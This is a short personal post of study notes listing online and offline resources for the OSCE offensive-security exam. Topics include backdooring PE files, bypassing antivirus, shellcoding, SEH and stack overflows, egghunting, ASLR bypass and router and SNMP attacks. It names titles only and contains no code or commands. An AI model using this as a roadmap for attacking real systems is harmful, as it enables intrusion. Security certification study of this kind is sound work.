Found some notes from my OSCE study guide…I didnt compile this entire list but I used this.
Online Study Resources
1. Advanced Web Attacks
2. Backdooring PE
- Backdooring PE Files - Part 1 Part 2 (Nice intro on basic PE backdooring)
- Manually Adding Shellcode to Windows Executables (Short and to the point)
- Introduction to Manual Backdooring by your favourite llama
- The Beginners Guide to Codecaves (Good read but don’t spend too much time on it)
3. Bypassing AV
4. Exploit development
- Fuzzing
- Assembly and Shellcode basics
- SLAE (Great course for assembly fresh-up and shellcoding basics)
- SLAE alternatives for ASM 1 2
- Understanding Windows Shellcode by Skape
- Corelan: Introduction to Win32 shellcoding
- FuzzySecurity: Writing W32 shellcode
- Stack Based Overflow
- SEH
- Corelan 3a and 3b
- FuzzySecurity’s Exploit Development 3
- Securitysift’s Windows Exploit Development 6
- The need for a POP POP RET instruction sequence
- Egghunting
- Skape’s Whitepaper on egg-hunting
- Corelan 8
- FuzzySecurity’s Exploit Development 4
- Securitysift’s Windows Exploit Development 5
- egg hunter - Exploit-DB
- Bypassing ASLR
- Corelan Series 6
- Bypassing ASLR
5. Advanced Network Attacks
- Bypassing Router’s Access Control List
- Firewall ACL Bypass
- Hacking networks with SNMP
- TCP Session Hijacking
- Cisco SNMP configuration attack with a GRE tunnel
- Exploiting Cisco Routers
6. Study cases:
Offline Study Resources
- Hacking: The Art of Exploitation: Chapter 1,2,3 and 5 are relevant to OSCE.
- Assembly Language Step-by-Step: Programming with Linux
- The Shellcoder’s Handbook: Discovering and Exploiting Security Holes